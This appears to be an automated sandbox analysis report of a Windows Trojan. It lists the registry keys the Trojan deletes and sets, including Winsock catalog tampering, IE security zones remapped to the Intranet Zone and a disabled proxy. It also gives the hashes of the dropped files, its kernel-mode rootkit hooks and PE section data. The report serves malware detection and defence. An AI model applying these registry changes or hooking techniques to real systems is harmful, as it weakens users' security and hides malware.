"BitNames" = " Error Unusual Info Debug"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1001"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Provider List" = ""
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 2.0 Provider ID" = "30 18 5F 8D 73 C2 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Setup Version" = "4105"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Known Static Providers" = "Tcpip, NwlnkIpx, NwlnkSpx, AppleTalk, IsoTp"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F CF 21 29 2E 4E 77 FE B6 5E A5 43 70 0E 28 BA"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"AppleTalk" = "A0 17 3B 2C DF C6 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "1"
"Num_Catalog_Entries" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"IsoTp" = "B0 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"McsXns" = "B1 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000002]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
The process EXE_temp3.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCR\Shell.User\Group]
"bl" = "A9 91 9C 93 24 46 01 23 62 18 79 19 0C 77 50 72"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"
[HKCR\Shell.User]
"mmc" = "0050563cacd6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\Shell.User\Group\001]
"(Default)" = "4A 7C 2C 77 6E 02 24 14 9D DB D7 C6 BB 04 7A 13"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"LibraryPath" = "%SystemRoot%\System32\winrnr.dll"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"DisplayString" = "ÃÂÂøÂçλÖÃÖªÃÂÂþ (NLA) Ãû³Æ¿Õ¼ä"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Serial_Access_Num" = "4"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"StoresServiceClassInfo" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\Shell.User]
"nam" = "58lm/temptation.bin"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Enabled" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Version" = "0"
[HKCR\Shell.User\Group]
"lb" = "E0 89 2F 53 1D 22 70 19 48 38 3F 78 54 6B 83 93"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCR\Shell.User\Group]
"lh" = "C6 B4 D0 9F A2 CB D4 B0 BB AD FF A7 56 06 63 5D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Num_Catalog_Entries" = "3"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"SupportedNameSpace" = "15"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Shell.User\Group\001]
"dat" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 0B 74 25 87 0B 8C 56 3B B8 3C F3 4E 22 C1 A7"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"SupportedNameSpace" = "32"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1027"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_Protocol_Catalog" = "Protocol_Catalog9"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"StoresServiceClassInfo" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"DisplayString" = "NTDS"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"WinSock_Registry_Version" = "2.0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Version" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Enabled" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\Shell.User\Group]
"cfg" = "57 56 1B 01 5E 4C 05 5C 14 19 18 15 1E 0A 13 59"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"DisplayString" = "Tcpip"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"StoresServiceClassInfo" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"Enabled" = "1"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_NameSpace_Catalog" = "NameSpace_Catalog5"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"SupportedNameSpace" = "12"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"ProviderId" = "40 9D 05 22 9E 7E CF 11 AE 5A 00 AA 00 A7 11 2B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"ProviderId" = "EE 37 26 3B 80 E5 CF 11 A5 55 00 C0 4F D8 D4 AC"
"Version" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Serial_Access_Num" = "12"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"ProviderId" = "3A 24 42 66 A8 3B A6 4A BA A5 2E 0B D7 1F DD 83"
[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Num_Catalog_Entries" = "11"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
The process MiniIE.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 D7 28 7A 25 5D D9 D2 9F EC C0 58 AD FB 76 5B"
[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\JMt\MiniIE.exe"
The process qtool.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD D9 B6 E0 D6 CA 25 68 19 49 38 F7 A3 05 6F 90"
The process EXE_temp0.exe:980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 3F D9 80 23 28 AE DA BA 09 DF 20 13 55 0A DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process wpzir.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 1B A5 9B 95 89 B1 80 07 DC 08 1E E3 81 E5 9C"
The process %original file name%.exe:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 9A 60 99 5B 65 DF 0F 28 7E 33 17 29 04 B9 BF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp1.EXE" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp4.EXE" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
30b0c990aec1f50be231a3856ecb3bf8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp0.exe |
aed6d5df54ffc8b690ac09b59b3ca430 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp1.EXE |
2a1032cde760529d39f4c5f8726dc2a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp2.exe |
a14c1a37f8bfa01fac48c2e55e0ba1b5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp4.EXE |
a15e8668aa777e4d4150aee35d2ff6a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Sawrdxeyd.exe |
a0616a47dd5ee80322aef4316c392c28 | c:\Program Files\Common Files\Lkcjzquw.exe |
8ae4a1d90f2a6e9385945db349908df5 | c:\Program Files\Common Files\mdhc\dsau.exe |
cf31b64c744a98a0407f4507ae113702 | c:\WINDOWS\JMt\MiniIE.exe |
0bdf9d8c796730d85f4a1a249a033f8d | c:\WINDOWS\JMt\sys32\qtool.exe |
c20aa25e91066fccc444a58542c23dd9 | c:\WINDOWS\JMt\sys32\shock.dll |
5d92b4c13bafd09fad76ef97c48fec0e | c:\WINDOWS\JMt\sys32\shock.exe |
add24b3c6cb353cdad827d12c751427d | c:\WINDOWS\JMt\win32\DPro.sys |
a76ad9fe26c1986b1d7f1c8ef8d44c7b | c:\WINDOWS\JMt\win32\reTcp.sys |
43577fc3cc5c7db31ee2f778d738fda8 | c:\WINDOWS\JMt\win32\rename.exe |
cc686eb2b7a4ade59e1c4092cba060a9 | c:\WINDOWS\JMt\win32\svchots.exe |
e9e72a6dbeacd5baa07688de88180a48 | c:\WINDOWS\JMt\wpzir.exe |
39462f857848c335921707727b66df46 | c:\WINDOWS\share\ico.dll |
c6ad526a469588556ff14961929e0713 | c:\WINDOWS\share\rsvp\objs.exe |
a131b4be9f388351e102feb40192db80 | c:\WINDOWS\system32\DqKgbb.dll |
51af4e81bc4bd3abf1cb8ce8703b364f | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwCreateSection
The Trojan installs the following kernel-mode hooks:
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1630 | 4096 | 2.08739 | a5ac40d413ebeb6ce9558f2e31e30273 |
.rdata | 8192 | 1002 | 4096 | 1.10247 | 845b3880bb89b7f2d62318a9a4946b4b |
.data | 12288 | 1172 | 4096 | 0.052325 | 98570c295ac0b95b533a0c5458850e63 |
.rsrc | 16384 | 928 | 4096 | 0.559435 | 26a9e24fa9407d501ca0b0c40ee8d6a1 |
.fyf | 20480 | 73728 | 73728 | 5.42306 | 5de1b1bb94e796f2272dd007d3f6e0a0 |
